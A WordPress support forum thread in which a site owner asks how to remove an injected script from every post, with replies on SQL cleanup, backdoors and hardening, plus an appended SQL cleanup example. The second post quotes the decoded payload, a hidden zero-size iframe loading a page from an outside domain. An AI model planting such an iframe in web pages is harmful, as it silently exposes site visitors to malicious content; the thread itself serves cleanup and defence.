WordPress.org

Forums

Google flagged my site as malicious (6 posts)

  1. Surge
    Member
    Posted 4 years ago #

    Hi all,

    A few days ago Google and my hosting provider sent me a message that my site may contain malicious code. I found out that in each post there is a script that opens an iframe and loads a page on some domain in India but the page won't even load. My question is how do I remove this script from all the posts? I know it can be done with SQL commands but I'm too unfamiliar with them to do it. Also, will removing this script fix the issue? Or is there a bigger issue... since I don't have a clue how it got in there. I run the latest version, have no plugins, and only made a basic theme. I found the script in the wp_posts table in the post_content field. Here is the script, and thanks a lot for your help!!

    Google says this is the suspected injected code:

    [Code moderated]

  2. Surge
    Member
    Posted 4 years ago #

    Oh... in case you're curious the encoded part translates to:

    ("<iframe src="http://internet-stat.in/includes1/in.cgi?4" width="0" height="0" style="visibility:hidden"></iframe>

  3. jimmyt1988
    Member
    Posted 4 years ago #

    You may already know this. Perhaps it's too much effort to go through the amount of posts you have. But say you have only 20 posts.. It might just be worth removing this code from within phpmyadmin within the database.

    If it is something like 100 posts, it may be worth looking through sql batch commands. I'm really not sure of the specific syntax for it. Surely there is something that when run, deletes a string from each entry within a table.

    Best bet for the latter is to go onto a SQL forum. Ah, sorry it's a weak response, really hope I helped in some way.

    Other than that, if the iframe is the only iframe on the page, you could style it with css and say display:none; ?

  4. Surge
    Member
    Posted 4 years ago #

    Thanks anyway jimmy. I'm mostly concerned about how it got in there. If I don't patch the hole I might clean it up but it could come right back. Hopefully someone else has some insight on that. Thanks.

  5. nlaferle
    Member
    Posted 4 years ago #

    I encountered the same issue with a blog I administer. Running 2.9.2. Almost seems as though the injection occurred at the DB level, as previously noted, as every record in wp_posts included the same block of code, even 'inherit' records.

  6. WP Voyager
    Member
    Posted 4 years ago #

    @sur6e: Whoever hacked your site to insert the iframe has probably left a backdoor open for himself. In other words, once he hacked it the first time, it is always easier for him to get in the next time. If you take the necessary steps to clean your installation, this should patch the hole, though.

    Check out this FAQ:
    http://codex.wordpress.org/FAQ_My_site_was_hacked

    And then have a look at the following resources:
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

    Once you are done, have a look at this Codex article to help prevent against future attacks:
    http://codex.wordpress.org/Hardening_WordPress

    And if you still have questions, the following search query should help:
    http://wordpress.org/search/hacked?documentation=1&forums=1

    I hope this is enough info :-)

    Good luck beating that hacker,
    MindBlender 3D
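
The bulk cleanup asked about in this thread (removing one injected string from `post_content` in every `wp_posts` row, including the 'inherit' records mentioned above), as an added example that is not from any of the posters. It assumes MySQL and the default `wp_` table prefix; the quoted string is a placeholder for the exact injected block, which the forum moderated, and the backup table name is made up for this example.

```sql
-- Added example. Replace the placeholder literal in all three places with
-- the exact injected block as stored in post_content, doubling any single
-- quotes inside it ('' instead of ').

-- 1. Scope the damage: affected rows by post type and status. Revisions and
--    attachments ('inherit' rows) show up here too.
SELECT post_type, post_status, COUNT(*) AS affected
FROM wp_posts
WHERE INSTR(post_content, '<script>PLACEHOLDER_INJECTED_BLOCK</script>') > 0
GROUP BY post_type, post_status;

-- 2. Copy the table before changing it. This is both the undo path and a
--    record of what the injected content looked like.
CREATE TABLE wp_posts_backup_before_cleanup LIKE wp_posts;
INSERT INTO wp_posts_backup_before_cleanup SELECT * FROM wp_posts;

-- 3. Strip the block from every affected row. The transaction only allows a
--    ROLLBACK if wp_posts is InnoDB; on MyISAM the backup from step 2 is the
--    only way back.
START TRANSACTION;

UPDATE wp_posts
SET post_content = REPLACE(post_content,
        '<script>PLACEHOLDER_INJECTED_BLOCK</script>', '')
WHERE INSTR(post_content, '<script>PLACEHOLDER_INJECTED_BLOCK</script>') > 0;

-- Should match the total from step 1; if it does not, ROLLBACK instead.
SELECT ROW_COUNT() AS rows_cleaned;

COMMIT;

-- 4. Verify. Any row listed here still contains script or iframe markup
--    (a variant of the block, or legitimate embeds) and needs a manual look.
SELECT ID, post_type, post_status, post_modified
FROM wp_posts
WHERE post_content LIKE '%<script%'
   OR post_content LIKE '%<iframe%'
ORDER BY post_modified DESC;
```

This cleans the stored content only; if the rows are re-infected afterwards, the entry point discussed in the last reply is still open.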
